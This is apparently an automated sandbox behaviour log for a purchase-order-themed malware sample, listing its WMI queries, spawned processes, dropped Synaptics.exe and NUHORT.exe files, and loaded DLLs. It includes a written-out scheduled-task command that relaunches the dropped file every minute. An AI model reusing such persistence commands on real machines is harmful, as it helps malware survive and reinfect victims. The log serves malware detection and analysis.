                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Windows\SysWOW64\wscript.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe File read: C:\Users\user\Desktop\desktop.ini
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
                                Source: wscript.exe, 00000006.00000003.2278413527.00000000031AE000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Select * from Win32_Process where name like '._cache_New PO - Supplier 0202AW-PER2.exe'OM;.EX
                                Source: New PO - Supplier 0202AW-PER2.exe ReversingLabs: Detection: 92%
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe File read: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe
                                Source: unknown Process created: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe "C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe"
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Process created: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe "C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe"
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                Source: unknown Process created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Process created: C:\Windows\SysWOW64\cmd.exe C:\Windows\system32\cmd.exe /c schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
                                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Process created: C:\Windows\SysWOW64\wscript.exe WSCript C:\Users\user\AppData\Local\Temp\QHCPYO.vbs
                                Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\SysWOW64\schtasks.exe schtasks /create /tn QHCPYO.exe /tr C:\Users\user\AppData\Roaming\Windata\NUHORT.exe /sc minute /mo 1
                                Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                Source: unknown Process created: C:\ProgramData\Synaptics\Synaptics.exe "C:\ProgramData\Synaptics\Synaptics.exe"
                                Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe "C:\Users\user\AppData\Roaming\Windata\NUHORT.exe"
                                Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 23736
                                Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE Process created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 12288
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 17084
                                Source: unknown Process created: C:\Users\user\AppData\Roaming\Windata\NUHORT.exe C:\Users\user\AppData\Roaming\Windata\NUHORT.exe
                                Source: C:\ProgramData\Synaptics\Synaptics.exe Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 4076 -s 14008
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: apphelp.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: version.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: wininet.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: wsock32.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: netapi32.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: uxtheme.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: windows.storage.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: wldp.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: kernel.appcore.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: textshaping.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: propsys.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: twext.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: windows.staterepositoryps.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: appresolver.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: bcp47langs.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: slc.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: userenv.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: sppc.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: policymanager.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: msvcp110_win.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: ntshrui.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: sspicli.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: windows.fileexplorer.common.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: iertutil.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: profapi.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: srvcli.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: cscapi.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: netutils.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: shacct.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: idstore.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: twinapi.appcore.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: samlib.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: starttiledata.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: wlidprov.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: samcli.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: acppage.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: sfc.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: msi.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: aepic.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: sfc_os.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: ntmarta.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: cryptsp.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: provsvc.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: edputil.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: urlmon.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: wintypes.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: onecorecommonproxystub.dll
                                Source: C:\Users\user\Desktop\New PO - Supplier 0202AW-PER2.exe Section loaded: onecoreuapcommonproxystub.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: apphelp.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: iphlpapi.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: mpr.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: userenv.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: uxtheme.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: version.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: wininet.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: winmm.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: wsock32.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: kernel.appcore.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: windows.storage.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: wldp.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: propsys.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: wbemcomn.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: napinsp.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: pnrpnsp.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: wshbth.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: nlaapi.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: mswsock.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: dnsapi.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: winrnr.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: fwpuclnt.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: rasadhlp.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: amsi.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: profapi.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: sxs.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exe Section loaded: sspicli.dll
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: linkinfo.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: ntshrui.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: cscapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\Users\user\Desktop\._cache_New PO - Supplier 0202AW-PER2.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: apphelp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: profapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: propsys.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntmarta.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iertutil.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: sspicli.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winhttp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: iphlpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dll
                                Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wbemcomn.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: kernel.appcore.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: taskschd.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: sspicli.dll
                                Source: C:\Windows\SysWOW64\schtasks.exeSection loaded: xmllite.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: apphelp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: propsys.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: mpr.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: userenv.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: uxtheme.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: version.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wininet.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: winmm.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wsock32.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: kernel.appcore.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: windows.storage.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: wldp.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: propsys.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: version.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wininet.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wsock32.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netapi32.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: uxtheme.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: windows.storage.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wldp.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: kernel.appcore.dll
                                Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: textshaping.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: iphlpapi.dll
                                Source: C:\Users\user\AppData\Roaming\Windata\NUHORT.exeSection loaded: mpr.dll
